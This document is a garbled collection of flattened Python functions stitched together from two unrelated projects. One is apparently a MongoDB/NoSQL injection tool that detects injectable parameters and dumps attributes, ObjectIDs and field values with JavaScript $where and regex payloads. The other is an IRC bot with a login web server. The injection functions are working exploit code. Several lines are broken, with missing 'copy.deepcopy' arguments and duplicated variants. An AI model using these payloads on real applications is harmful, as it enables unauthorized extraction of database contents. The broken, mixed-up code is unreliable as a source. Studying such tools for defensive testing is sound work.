def retrieveMaxLength(self): try: length = 1; data = copy.deepcopy(; self.injectRegex(data,self.param,".{"+str(length)+"}"); #data.pop(self.param); #data[self.param+"[$regex]"] = ".{"+str(length)+"}"; req = self.scanner.sendData(data); check = self.scanner.check(req); while check != "none": if length == 70: if question("Length abnormally long. Do you want to terminate the program?"): return -1; length += 1; data = copy.deepcopy(; self.injectRegex(data,self.param,".{"+str(length)+"}"); #data.pop(self.param); #data[self.param+"[$regex]"] = ".{"+str(length)+"}"; req = self.scanner.sendData(data); check = self.scanner.check(req); success("Retrieved max length: " + str(length-1)); return length-1; except Exception as e: print(e); failure("Failed to retrieve max length."); return -1;
def retrieveMaxLength(self, attribute): try: length = 1 payload = self.buildPayload( self.options, " || this." + attribute + ".toString().match(\\\".{" + str(length) + "}\\\") && '' == '") data = copy.deepcopy( data[self.param] = payload req = self.scanner.sendData(data) while self.scanner.check(req) != "none": if length == 70: if question( "Length abnormally long. Do you want to terminate the program?" ): return -1 length += 1 payload = self.buildPayload( self.options, " || this." + attribute + ".toString().match(\".{" + str(length) + "}\") && '' == '") data = copy.deepcopy( data[self.param] = payload req = self.scanner.sendData(data) success("Retrieved max length: " + str(length - 1)) return length - 1 except Exception as e: print(e) failure("Failed to retrieve max length.") return -1
def handle_connect(self): if self.verbose: output.success('Connected!', 'STATUS') if self.serverpass: self.write(('PASS', self.serverpass), output=False) self.write(('NICK', self.nick), output=False) self.write(('USER', self.user, '+iw', self.nick),, output=False)
def handle_connect(self): self.irc_startup = int(time.time()) output.success('Connected!', 'STATUS') if self.server_password: self.write(('PASS', self.server_password), output=False) self.write(('NICK', self.nick), output=False) self.write(('USER', self.user, '+iw', self.nick),, output=False)
def handle_connect(self): if self.verbose: output.success('Connected!', 'STATUS') if self.server_password: self.write(('PASS', self.server_password), output=False) self.write(('NICK', self.nick), output=False) self.write(('USER', self.user, '+iw', self.nick),, output=False)
def init(host, port): """Tries to start the webserver. Fails if someone initiates a reload, or port is already in use.""" try: time.sleep(5) server = HTTPServer(("", port), WebServer) output.success("Starting HTTP server on %s:%s" % (host, port), "WEBSERVER") except: return server.serve_forever()
def grabDataFromID(self, objectID): dump = {} for attribute in self.scanner.element_attributes: if attribute == "_id": continue length = -1 value = None try: testLength = 0 bold("Attempting to retrieve length of " + attribute + " for ID " + objectID) while length == -1: testLength += 1 if testLength == 70: if question( "The length seems unnaturally long. Skip this attribute?" ): break regex = "^" + "." * testLength + "$" payload = self.buildPayload( self.options, " || this." + attribute + ".toString().match(\\\"" + regex + "\\\") && this._id.str == '" + objectID) data = copy.deepcopy( data[self.param] = payload req = self.scanner.sendData(data) check = self.scanner.check(req) if check != "none": length = testLength success("Retrieved length " + str(testLength) + " for " + attribute + " for ID " + objectID) except Exception as e: print(e) failure("Failed to retrieve exact length for " + attribute + " for ID " + objectID) try: if length == -1: failure("Failed to retrieve " + attribute + " for ID " + objectID) continue bold("Attempting to retrieve value of " + attribute + " for ID " + objectID) except Exception as e: print(e) failure("Failed to retrieve value of " + attribute + " for ID " + objectID) dump[attribute] = { "length": length, "value": value } return dump
def init(host, port): """Tries to start the webserver. Fails if someone initiates a reload, or port is already in use.""" try: time.sleep(5) server = HTTPServer(('', port), WebServer) output.success('Starting HTTP server on %s:%s' % (host, port), 'WEBSERVER') except: return server.serve_forever()
def grabData(self): if len(self.scanner.element_attributes) > 0: if question( "There are already some found attributes. Do you want to find again with this module?" ): self.grabElementAttributes() else: self.grabElementAttributes() if len(self.scanner.element_attributes) > 0: success("Some attributes are present. We can proceed to step 2.") bold("Attributes to be used:") for attribute in self.scanner.element_attributes: bold("- " + attribute) else: failure("No attributes could be found. We cannot dump anything.") return None if len(self.scanner.objectIDs) > 0: if question( "There are already some found IDs. Do you want to find again with this module?" ): self.grabIDs() else: self.grabIDs() if len(self.scanner.objectIDs) == 0: failure("No IDs found. Database may be empty.") return None if len(self.scanner.objectIDs) > 0: success("Some ObjectIDs are present. Proceeding with step 3.") grabbedData = {} for objectID in self.scanner.objectIDs: dump = self.grabDataFromID(objectID) grabbedData[objectID] = dump output = [] for id in grabbedData: output.append(id) dump = grabbedData[id] for attrib in dump: value = dump[attrib]["value"] output.append("\t" + attrib + " : " + str(value)) return ["Element Attributes:"] + self.scanner.element_attributes + [ "", "Object IDs:" ] + self.objectIDs
def testParam(self, p): successes = [] tests = getTests(self.url, p, self) self.tests[p] = tests for testname in tests: test = tests[testname] if str(test.getID()) in self.techniques or str( test.getType()) in self.techniques: info("Attempting " + testname) if test.vulnTest(): success(p + " is " + testname + " injectable!") successes.append(testname) else: verbose("Skipping test " + testname) return successes
def docstring(): symbol = '*' lines = __doc__.strip().split('\n') largest = 0 for line in lines: if len(line) > largest: largest = len(line) outer = (largest + (1 * 4)) * symbol output.normal(outer, False) for line in lines: tmp = symbol + (1 * ' ') + line sidedif = (largest + (1 * 4)) - len(tmp) - 1 tmp += ' ' * sidedif + symbol output.normal(tmp, False) output.normal(outer, False) output.success('Initializing the bot', 'START')
def retrieveLengths(self,maxLength): lengths = []; for length in range(1,maxLength+1): try: data = copy.deepcopy(; self.injectRegex(data,self.param,"^(.{"+str(length)+"})$"); #data.pop(self.param); #data[self.param+"[$regex]"] = "^(.{"+str(length)+"})$"; req = self.scanner.sendData(data); check = self.scanner.check(req); if check != "none": lengths.append(length); success("Retrieved length " + str(length)); except Exception as e: print(e); failure("Failed to retrieve exact length."); return lengths; return lengths;
def login_auth(): bad = "Failed login from %s" % request.remote_addr good = "Successful login from %s" % request.remote_addr if request.json: post_data = request.json else: post_data = request.forms if not post_data: output.error(bad, "WEBSERVER") return {'success': False} isauthed = verify(post_data['passwd'], raw=True) if isauthed: response.set_cookie("auth", isauthed, max_age=2419200, path="/") output.success(good, "WEBSERVER") return {'success': True} else: output.error(bad, "WEBSERVER") return {'success': False}
def showTechniqueHelp(techniques): tests = getTests("", "", Scanner("http://localhost/index.php?me=a")) for testname in tests: test = tests[testname] if str(test.getID()) in techniques or str( test.getType()) in techniques: plain("") success(testname) print("_" * 50) failure("ID: " + str(test.getID())) type = "(a) Array Injection" if test.getType() == "w": type = "(w) Where Injection" if "blind" in testname.lower(): type = "Blind " + type failure("Type: " + type) plain("") test.doc() print("_" * 50)
def retrieveLengths(self, maxLength, attribute): lengths = [] for length in range(1, maxLength + 1): try: regex = "^" + "." * length + "$" payload = self.buildPayload( self.options, " || this." + attribute + ".toString().match(\\\"" + regex + "\\\") && '' == '") data = copy.deepcopy( data[self.param] = payload req = self.scanner.sendData(data) check = self.scanner.check(req) if check != "none": lengths.append(length) success("Retrieved length " + str(length)) except Exception as e: print(e) failure("Failed to retrieve exact length.") return lengths return lengths
def vulnTest(self): failPayl = "\\" data = copy.deepcopy( data[self.param] = failPayl self.scanner.textErrorBaseline = self.scanner.sendData(data).text if self.scanner.textErrorBaseline != self.scanner.textBaseline: success("Basic check succeeded!") else: bold("Basic check failed. The rest of this module may not work.") for options in self.getAllOptions(): verbose("Testing with: " + str(options)) data = copy.deepcopy( data[self.param] = self.buildPayload( options, "; if(JSON.stringify(this).startsWith('{')){ return this; }; var dum = " ) req = self.scanner.sendData(data) if req.text != self.scanner.textErrorBaseline: self.options = options success("Error-based content check worked!") success("Payload built!") return True return False
def tryElementAttribute(self, attribute, newAttributes, retry=0): if retry > 10: failure( "Failed to connect to target 10 times! Consider killing the program." ) return try: payload = self.buildPayload( self.options, " || this." + attribute + ".toString().match(/.*/) && '' == '") data = copy.deepcopy( data[self.param] = payload req = self.scanner.sendData(data) if req.text != self.scanner.textErrorBaseline: if attribute not in self.scanner.element_attributes: newAttributes.append(attribute) success("Found an element attribute: " + attribute) else: info("Element attribute: " + attribute + " reconfirmed.") except: self.tryElementAttribute(atrribute, newAttributes, retry + 1)
def grabIDs(self): if "_id" not in self.scanner.element_attributes: #All elements MUST have _id. If this was not found, then this probably wasn't an element. failure("_id was not one of the found attributes. Cannot dump.") else: self.keyAttribute = "_id" bold("Using " + self.keyAttribute + " as a unique key.") self.toGrabInFuture = [] self.dumpIDValue() threads = [] while len(self.toGrabInFuture) > 0: var = self.toGrabInFuture.pop() self.dumpIDValue(var=var, retry=5) for id in self.objectIDs: if id not in self.scanner.objectIDs: success("New ObjectID: " + id) self.scanner.objectIDs.append(id) else: bold("Re-confirmed id: " + id)
def vulnTest(self): failPayl = "\\"; data = copy.deepcopy(; data[self.param] = failPayl; self.scanner.textErrorBaseline = self.scanner.sendData(data).text; if self.scanner.textErrorBaseline != self.scanner.textBaseline: success("Basic check succeeded!"); else: bold("Basic check failed. The rest of this module may not work."); for options in self.getAllOptions(): verbose("Testing with: " + str(options)); data = copy.deepcopy(; data[self.param] = self.buildPayload(options,"; return this; var dum = "); req = self.scanner.sendData(data); if req.text != self.scanner.textErrorBaseline: self.options = options; success("Error-based content check worked!"); success("Payload built!"); success(data[self.param]); return True; return False;
def main(): colinit() banner() #Initiations parsed = extractArgs() scanner = initScanner(parsed) #Test connection to target if scanner.testConnection(): success("URL can be reached.") else: failure(scanner.url + " cannot be reached. Did you forget http://?") sys.exit(1) print() params = scanner.getParams() if "v" in parsed: setVerbose(True) if "p" in parsed: toTest = parsed["p"].split(",") for param in toTest: if param not in params: failure("Param, " + param + " is not provided in your get/post data!") sys.exit(1) params = toTest verbose("Going to test the following parameters:") for param in params: verbose(param) print() bold("Beginning testing phase.") vulnParams = {} tested = 0 for param in params: tested += 1 bold("Testing for param " + param) successes = scanner.testParam(param) if len(successes) > 0: vulnParams[param] = successes success(param + " is injectible.") if tested < len(params): if not question("Continue testing other parameters?"): break print() bold("Test phase completed.") if len(vulnParams) == 0: failure("No vulnerable parameters found.") sys.exit(1) print() success("Vulnerable Parameters:") for param in vulnParams: success(param) for vuln in vulnParams[param]: success("- " + vuln) print() info("Attempting to dump data...") for param in vulnParams: bold("Parameter: " + param) for vuln in vulnParams[param]: print() bold("Attemping dump with " + vuln + " on param " + param) print() dump = scanner.dumpData(param, vuln) if dump == None: print() failure(vuln + " for " + param + " failed to dump.") else: print() success(vuln + " for " + param + " has retrieved:") if type(dump) == type("str"): success("\t" + dump) elif type(dump) == type({}): for key in dump: success("\t" + str(key) + " : " + str(dump[key])) elif type(dump) == type([]): for i in dump: success("\t" + str(i)) print()
def main(argv=None): # 1: Parse The Command Line parser = optparse.OptionParser('%prog [options]') parser.add_option( '-c', '--config', metavar='fn', help='use this configuration file or directory' ) opts, args = parser.parse_args(argv) # 2: Documentation output docstring() # 3: Require python 2.7 or later if sys.version_info < (2, 7): output.error('Requires Python 2.7.x, from') sys.exit(1) # 4. Create ~/.code if not made already if not os.path.isdir(dotdir): if not os.path.isdir(dotdir): try:'Creating database directory in ~/.code...') os.mkdir(dotdir) except Exception as e: output.error('There was a problem creating %s:' % dotdir) output.error(str(e)) output.error('Please fix this and then run code again.') sys.exit(1) # 5: Load The Configuration bot_config = opts.config or 'config.json' # and check if exists if not os.path.isfile(bot_config): output.error( 'Configuration file "%s" does not exist. Please copy ' 'the example.json to config.json then run Code again' % bot_config) sys.exit(1) try: config = parse_json(bot_config) except Exception as e: output.error('The config file has syntax errors. Please fix them and run Code again!\n' + str(e)) sys.exit(1) global threads for server in config['servers']: if server['host'] == '': continue id = len(threads) process = Process(target=connect, args=(id, setupServer(server),)) process.daemon = True process.start() threads.append({'id': id, 'config': server, 'process': process}) time.sleep(5) # 6: Begin managing these processes try: # set some temporary variables that we will be using for config # file version checking conf_last_check = int(time.time()) conf_last_mtime = int(os.path.getmtime(bot_config)) while True: time.sleep(1) if (int(time.time()) - conf_last_check) > 10 and int(os.path.getmtime(bot_config)) > conf_last_mtime: conf_last_check = int(time.time()) conf_last_mtime = int(os.path.getmtime(bot_config)) try: # If the new configuration file isn't the same as the last # one that we saved, attempt to re-import it config_new = parse_json(bot_config) if len(config_new['servers']) == len(config['servers']) and len(config_new['servers']) == len(threads): output.success('Configuration file %s has changed! Use the restart command to take affect!' % bot_config) config = config_new for i in range(len(config['servers'])): # Once they reboot that connection, it should autoload # the new config. threads[i]['config'] = config['servers'][i] except Exception as e: # Only spit out errors once per file modification output.error("Configuration file has been changed, however I cannot read it! (%s)" % str(e)) if len(threads) == 0: output.warning('No more processes to manage. Exiting...') sys.exit() for id in range(len(threads)): p = threads[id]['process'] if p.exitcode == 0: # Assume it exited safely. Ignore the termination. p.terminate() output.status('Terminating process ID #%s (%s:%s)' % (id, threads[id]['config']['host'], threads[id]['config']['port'])) del threads[id] break if p.exitcode == 1: # Exited erronously. We'll just assume it wants a reboot. p.terminate() p = Process(target=connect, args=(id, setupServer(threads[id]['config']),)) p.daemon = True delay = threads[id]['config']['connect_delay'] if 'connect_delay' in threads[id]['config'] else 20 output.error('Restarting process id #%s (%s:%s) in %s seconds.' % ( id, threads[id]['config']['host'], threads[id]['config']['port'], str(delay) )) time.sleep(delay) output.status('Regenerating process ID #%s (%s:%s)' % (id, threads[id]['config']['host'], threads[id]['config']['port'])) p.start() threads[id]['process'] = p except KeyboardInterrupt: output.success('Shutting down bot...', 'REQUEST') for id in range(len(threads)): p = threads[id]['process'] output.status('Terminating process ID #%s (%s:%s)' % (id, threads[id]['config']['host'], threads[id]['config']['port'])) p.terminate() time.sleep(1) sys.exit()
if __name__ == '__main__': try: main() while True: time.sleep(1) if len(threads) == 0: output.error( 'No more processes to manage. Exiting...', 'ERROR') sys.exit() for id in range(len(threads)): p = threads[id]['process'] if p.exitcode == 0: # Assume it exited safely. Ignore the termination. p.terminate() output.success('Terminating process ID %s (%s:%s)' % ( id, threads[id]['config']['host'], threads[id]['config']['port']), 'STATUS') del threads[id] break if p.exitcode == 1: # Exited erronously. We'll just assume it wants a reboot. p.terminate() p = Process( target=connect, args=(id, setupServer(threads[id]['config']),)) p.daemon = True output.success('Regenerating process ID %s (%s:%s)' % ( id, threads[id]['config']['host'], threads[id]['config']['port']), 'STATUS') p.start() threads[id]['process'] = p except KeyboardInterrupt: output.success('Shutting down bot...', 'REQUEST') sys.exit()